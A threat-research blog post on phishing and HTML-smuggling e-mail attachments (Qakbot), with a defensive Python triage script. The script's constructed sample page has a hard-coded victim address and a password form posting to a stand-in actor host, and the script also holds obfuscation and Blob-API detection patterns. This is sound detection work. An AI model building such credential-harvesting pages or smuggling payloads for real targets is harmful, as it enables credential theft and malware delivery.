HTML File Attachments: Still A Threat


This past month, Trustwave SpiderLabs observed that HTML (Hypertext Markup Language) file attachments had become a common occurrence in our spam traps, which is not unusual since malware is often delivered through phishing spam. Over the past 30 days, SpiderLabs found that the combination of .HTML (11.39%) and .HTM (2.7%) files, totaling 14.09%, is our second most spammed file attachment type, followed by .EXE files at 12.84%.


Figure 1: HTML file attachment type percentages

These threat actors are phishers; their main purpose is to steal sensitive information (such as login credentials and credit card details) for identity theft, extortion, access to the victim's finances, or to buy goods or services.

According to Microsoft, the cybercriminal groups DEV-0238 and DEV-0253 have also been sending HTML attachments that use HTML smuggling to deliver keyloggers. Microsoft has also attributed HTML smuggling campaigns that deliver Trickbot malware to the cybercriminal group DEV-0193.

Phishing attacks using HTML attachments

The most common spammed HTML attachments we see are phishing pages. The HTML file itself is generally benign, in the sense that it does not contain malicious code that executes arbitrary code on the system. The attachment should nevertheless be treated with caution: it mimics the sign-in page of services like Microsoft, Google or online banking portals, and the danger materializes when a user falls for the scam, enters their credentials into the form, and submits it.


Figure 2: Samples of phishing email with HTML attachments


Figure 3: HTML attachments that mimic Microsoft sign-in page. The phishing page may also have the target user’s email address hard-coded in the page.

SpiderLabs noticed that recent phishing HTML files contained the hard-coded email address of the target user, which makes the page more convincing to the victim. At the source level, adversaries employ various degrees of code obfuscation; the JavaScript is usually obfuscated with open-source tools such as JavaScript Obfuscator. The HTML files are not stand-alone, though: they pull the jQuery library, CSS and additional JavaScript code from various remote web servers to handle form objects and form actions.

Hard-coding the email address helps trick the victim into believing they had previously signed on to the page, since they only need to enter their password. Overall, this tactic makes the email appear more legitimate.

Below is the HTML source from one of the phishing attacks. It shows the level of JavaScript obfuscation.


Figure 4: Phishing HTML source code

In most instances, the HTML file is not fully autonomous. The JavaScript referenced by the inline scripts is usually loaded from remote servers, a mixture of legitimate CDN (content delivery network) hosts and hosts operated by the actors. The JavaScript that handles the data exfiltration is usually hosted on a web server owned or operated by the actors.


Figure 5: Inspecting the HTML source shows the JavaScript files it pulls from the remote web server.


Figure 6: JavaScript code loaded from the remote host by the HTML attachment file. It handles additional HTML DOM form actions, jQuery objects, CSS styling as well as anti-debugging and URL form checking.

Malware Delivery using HTML smuggling

To evade email gateways, adversaries use a technique called HTML smuggling to deliver a malware binary to the target user. The method relies on HTML5 features that work offline: the binary is stored inside the page as an immutable blob of data embedded in JavaScript code. When the file is opened in a web browser, the script decodes the data blob into a file object and the browser displays a download notification bar to the user. Combined with social engineering, this lures the target user into saving the binary to disk and opening it.

The screenshot below is an example of a spam campaign with an HTML file attachment.


Figure 7: An example of a Qakbot spam campaign that uses HTML file attachment

When loaded into a browser, the HTML file runs JavaScript that makes it appear as if a file had been downloaded from a remote web server. The ZIP file, however, is smuggled within the HTML source as an encoded data blob; the JavaScript decodes it and writes it out as a ZIP file.
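Both patterns described above leave static traces that a mail gateway or an analyst can check before a user ever opens the file: the credential-phishing page hard-codes the recipient's address and pulls its scripts and form handler from remote hosts, and the smuggling page carries a large encoded payload that script turns into a downloadable file object. The Python below is an added example written for this post, not SpiderLabs tooling or code from any of the samples shown. Its two HTML inputs are constructed, the host cdn-updates.example.net is a hypothetical name, and the thresholds (four hex escapes, 120-character base64 runs) are assumptions chosen for illustration.

```python
"""Static triage of an HTML e-mail attachment for credential-phishing and
HTML-smuggling indicators.  Added example; the samples are constructed."""
import base64
import binascii
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
HEX_ESCAPE_RE = re.compile(r"\\x[0-9a-fA-F]{2}")          # '\x70\x61...' string obfuscation
BASE64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")  # long base64 run = candidate payload
OBFUSCATION_TOKENS = ("eval(", "unescape(", "String.fromCharCode", "document.write(")
BLOB_API_TOKENS = ("atob(", "new Blob(", "URL.createObjectURL(", "msSaveOrOpenBlob(", ".download")
MAGIC = {b"PK\x03\x04": "zip", b"MZ": "pe-executable", b"%PDF": "pdf",
         b"\x7fELF": "elf", b"\xd0\xcf\x11\xe0": "ole-office", b"\x1f\x8b": "gzip"}

# Constructed phishing page: hard-coded recipient, jQuery from a legitimate CDN,
# helper script and form handler on a hypothetical actor host, hex-escaped JS.
PHISHING_SAMPLE = """<html><head>
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<script src="https://cdn-updates.example.net/js/fcx.js"></script>
</head><body>
<input type="email" id="i0116" value="victim@example.com" readonly>
<form action="https://cdn-updates.example.net/post.php" method="post">
<input type="password" name="passwd"></form>
<script>var _0x3a1b=['\\x70\\x61\\x73\\x73'];eval(_0x3a1b[0x0]);</script>
</body></html>"""

# Constructed smuggling page: a ZIP local-file-header magic plus zero padding,
# base64-encoded into the script.  The decode step is deliberately left out.
_FAKE_ZIP = b"PK\x03\x04" + bytes(200)
SMUGGLING_SAMPLE = (
    "<html><body><script>\n"
    "var data = '" + base64.b64encode(_FAKE_ZIP).decode() + "';\n"
    "var blob = new Blob([decoded], {type: 'application/octet-stream'});\n"
    "link.href = URL.createObjectURL(blob);\n"
    "link.download = 'ScannedDocuments.zip';\n"
    "</script></body></html>"
)


class _Collector(HTMLParser):
    """Collects script sources, form actions, password inputs and all text/script bodies."""
    def __init__(self):
        super().__init__()
        self.script_srcs, self.form_actions, self.password_fields, self.data = [], [], 0, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            self.script_srcs.append(a["src"])
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1

    def handle_data(self, data):          # <script> bodies arrive here as CDATA
        self.data.append(data)


def _hosts(urls):
    """Distinct remote hosts referenced by absolute http(s) URLs."""
    parsed = [urlparse(u) for u in urls]
    return sorted({p.hostname for p in parsed if p.scheme in ("http", "https") and p.hostname})


def _carve_payloads(text):
    """Decode every long base64 run and identify it by its leading magic bytes."""
    found = []
    for run in BASE64_RUN_RE.findall(text):
        try:
            raw = base64.b64decode(run, validate=True)
        except (binascii.Error, ValueError):
            continue
        kind = next((name for magic, name in MAGIC.items() if raw.startswith(magic)), "unknown")
        found.append({"file_type": kind, "size": len(raw)})
    return found


def triage_html_attachment(html):
    """Return the indicators found in one HTML attachment plus a coarse verdict."""
    p = _Collector()
    p.feed(html)
    p.close()
    text = "\n".join(p.data)
    markers = [t for t in OBFUSCATION_TOKENS if t in text]
    if len(HEX_ESCAPE_RE.findall(text)) >= 4:
        markers.append("hex-escaped-strings")
    blob_api = [t for t in BLOB_API_TOKENS if t in text]
    payloads = _carve_payloads(text)
    report = {
        "external_script_hosts": _hosts(p.script_srcs),
        "form_action_hosts": _hosts(p.form_actions),
        "hardcoded_emails": sorted(set(EMAIL_RE.findall(html))),
        "password_fields": p.password_fields,
        "obfuscation_markers": markers,
        "blob_api_calls": blob_api,
        "smuggled_payloads": payloads,
    }
    if payloads and blob_api:
        report["verdict"] = "html-smuggling"
    elif p.password_fields and (report["form_action_hosts"] or report["hardcoded_emails"]):
        report["verdict"] = "credential-phishing"
    elif markers or blob_api:
        report["verdict"] = "suspicious"
    else:
        report["verdict"] = "no-indicators"
    return report


if __name__ == "__main__":
    for name, sample in (("phishing", PHISHING_SAMPLE), ("smuggling", SMUGGLING_SAMPLE)):
        print(name, triage_html_attachment(sample))
```

A legitimate CDN host such as code.jquery.com is expected and is not a signal on its own; the actionable finding is a form action or helper script on a host unrelated to the brand the page imitates, combined with a password field and a pre-filled recipient address. Carving base64 runs and checking the decoded magic bytes works regardless of how the surrounding JavaScript is obfuscated, but only while the payload itself is plain base64; actors often add another encoding layer, so treat the carve as one indicator alongside the Blob and download API usage rather than as the sole check.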


Figure 8: File smuggling

The HTML source would look something like the screenshot below:


Figure 8.1: HTML source example

Shown below is the attack flow overview:


Figure 9: Attack flow overview


As you can see, obfuscation is the common denominator of these spammed HTML attachments, which shows how difficult it is to detect this kind of threat at the email gateway layer. Although HTML files are most of the time benign when opened, the danger lies in the user's subsequent action. Coupled with social engineering, this is what makes this type of attack successful.

Phishing HTML attachment

ScannedDocuments_9720709.html : Qakbot

ScannedDocuments_9720709.img : Qakbot